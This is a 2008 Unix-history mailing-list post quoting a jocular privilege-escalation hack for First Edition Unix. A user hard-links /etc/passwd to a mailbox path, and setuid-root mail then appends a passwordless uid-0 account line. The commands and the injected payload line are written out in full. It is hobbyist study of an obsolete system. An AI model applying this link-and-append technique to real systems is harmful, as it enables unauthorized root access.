[Unix-jun72] [TUHS] Some fun with 1st ed
wb at freebie.xs4all.nl
Sat May 3 15:29:43 EDT 2008
Quoting Larry McVoy, who wrote on Sat, May 03, 2008 at 12:24:00PM -0700 ..
> We need to send out a security alert immediately. This is serious.
CERT to the rescue! Man the barricades !
> On Sat, May 03, 2008 at 09:20:13AM -1000, Tim Newsham wrote:
> > All work and no play...
> > Here's a fun hack for first edition unix. From MAIL (I) :
> > When followed by the names of a letter and one or more people, the
> > letter is appended to each person's mailbox. Each letter is
> > preceded by the sender's name and a postmark.
> > A person is either the nameof an entry in the directory /usr, in
> > which case the mail is sent to /usr/person/mailbox, or the path
> > of a directory, in which case mailbox in that directory is used.
> > Mail is setuid root:
> > # ls -l /bin/mail
> > 80 surwr- 1 root 3940 Jan 1 00:00:00 mail
> > login as a non-root user (ie "bin"), create a file "letter" with the
> > contents "hack::0:/:". Run:
> > @ ln /etc/passwd /tmp/mailbox
> > @ mail letter /tmp
> > log out and log back in as "hack". You are now root. Cat /etc/passwd
> > and notice:
> > From bin Jan 1 00:49:22
> > hack::0:/:
> > clean up the file a little and enjoy your new elevated status.
> > Tim Newsham
> > http://www.thenewsh.com/~newsham/
> > _______________________________________________
> > TUHS mailing list
> > TUHS at minnie.tuhs.org
> > https://minnie.tuhs.org/mailman/listinfo/tuhs
> Larry McVoy lm at bitmover.com http://www.bitkeeper.com
> TUHS mailing list
> TUHS at minnie.tuhs.org
--- end of quoted text ---
More information about the Unix-jun72